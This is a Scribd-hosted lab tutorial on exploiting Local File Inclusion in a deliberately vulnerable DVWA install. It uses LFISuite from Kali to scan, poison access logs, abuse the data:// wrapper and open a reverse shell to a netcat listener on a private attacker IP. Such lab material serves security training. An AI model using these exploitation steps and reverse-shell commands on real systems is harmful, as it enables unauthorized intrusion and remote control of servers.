Scribd
Upload
553 views

Local File Inclusion Hacking Tutorial

This document provides instructions for setting up a Local File Inclusion (LFI) hacking tutorial using DVWA (Damn Vulnerable Web Application) on WAMP and exploiting it using an LFI hacking tool called LFI Suite on Kali Linux. It describes downloading and configuring DVWA on WAMP, cloning and running LFI Suite on Kali Linux, finding a vulnerable file path using LFI Suite's scanner, and exploiting the vulnerability through LFI Suite to obtain a reverse shell or shell access on the server.

Uploaded by

Atiya Sharf
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
553 views

Local File Inclusion Hacking Tutorial

This document provides instructions for setting up a Local File Inclusion (LFI) hacking tutorial using DVWA (Damn Vulnerable Web Application) on WAMP and exploiting it using an LFI hacking tool called LFI Suite on Kali Linux. It describes downloading and configuring DVWA on WAMP, cloning and running LFI Suite on Kali Linux, finding a vulnerable file path using LFI Suite's scanner, and exploiting the vulnerability through LFI Suite to obtain a reverse shell or shell access on the server.

Uploaded by

Atiya Sharf
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 8

Local File Inclusion hacking tutorial

Pre-requisites:
Kali Linux (installed: Git)

windows 7,8,10 (installed: WAMP)

Configuring DVWA on WAMP


Download DVWA form this site http://www.dvwa.co.uk/
Unzip the DVWA folder
Copy all files of DVWA package paste in folder in www folder under WAMP folder
C:\wamp\www
New folder named dvwa (C:\wamp\www\dvwa)
Open configuration folder (C:\wamp\www\dvwa\config)
Rename config.inc.php.dist file to config.inc.php
Edit config.inc.php file
o Edit db-password variable from p@ssw0rd to empty string ()
o Edit security level variable $_DVWA[ 'default_security_level' ] from 'impossible' to
'low'

Edit php.ini file (C:\wamp\bin\php\php5.3.10\php.ini)


o allow_url_include = Off -> allow_url_include = On
Open browser (assumed WAMP is running ) and type address in bar
http://localhost/dvwa/setup.php
Click on Create/Reset Database button
Enter default credentials
o Username: admin
o Password: password
When welcome page appears, DVWA configuration is successful.

Configuring LFI Suite on Kali Linux


Local file inclusion through LFI suite. It has three attacks;

Data

Access log

Auto-hack modality

Following are the steps to configure LFI suite;

First clone lfisuite through this url https://github.com/D35m0nd142/LFISuite.git using


following command;

o git clone https://github.com/D35m0nd142/LFISuite.git

go to recently downloaded folder lfisuite

o cd lfisuite

To run the LFI Suite, run python script file lifesuite.py


o Python lfisuite.py

Exploiting DVWA site using LFI Suite


To exploit DVWA site using LFI suite, we need to follow following steps;

Open the configured DVWA site on Kali Linux machine with Windows IP, which in our case is
http://192.168.93.141/dvwa/login.php
Login with the default credentials (admin/password) and then navigate to File Inclusion
page from left panel. (http://192.168.93.141/dvwa/vulnerabilities/fi/?page=include.php)
Now we need cookies and to find them we will use Live HTTP Header tool of Firefox (this
tool is not installed by default).

Copy the cookie value from the HTTP header

(Cookie value copied from here is;


Cookie: security=low; PHPSESSID=m5ag883teq7j3v7bt9dfki1011)
Now to exploit the page, we will move back to Kali Linux terminal where we ran LFI Suite.
First we will choose Scanner option and paste copied cookie value.
For the file containing path to test, we will use pathtotest.txt file, downloaded with LFI Suite.

Vernerable paths will be highlighted in red.

Now we will run LFI Suite script once again and this time will choose the Exploiter option
from the options available.
We will paste cookie value copied from HTTP header.
LFI Suite will ask if Tor proxy is to be used to or not and for our case we do not need it.

There are 9 exploits available in LFI Suite, we will choose Access log exploit (Choice 5).
Enter the vulnerable access_log url (ex: 'site/index.php?page=../logs/access_log') ->
http://192.168.93.141/dvwa/vulnerabilities/fi/?page=C:\wamp\logs\access.log
(Venerable path highlighted by scanner before)

This gave us shell access of the server, and we can verify it by whoami statement.
Now we will exit the shell and start LFI Suite script once again for data vulnerability.
We will choose Exploiter option and the data :// option.
Then we will enter page url
Enter the 'data://' vulnerable url (ex: 'http://site/index.php?page=') ->
http://192.168.93.141/dvwa/vulnerabilities/fi/?page=include.php

Now to get reverse shell first In another terminal window, we will start listening on port 1234
o nc lvpa 1234
Now coming back to LFI Suite script tab, where we have shell access, we will start reverse
shell by typing command reverseshell
Entering the IP address of Kali Linux Machine and port 1234
Enter the ip address to connect back to -> 192.168.93.131 (attacker ip address)
Enter the port to connect to -> 1234
Now in the terminal we started listening on port, we have reverse shell access.
Now we will try the auto hack option which will try all possible hacks and give the shell
access by first successful method.
To start auto hack, we will start LFI Suite script once again and choose Exploiter option.
After giving cookie value, it will give auto_hack option as last available option of available
hacks, we will select auto_hack option.
Enter the URL you want to hack-> http://192.168.93.141/dvwa/vulnerabilities/fi/?
page=include.php
It gave the shell access by first successful method.

You might also like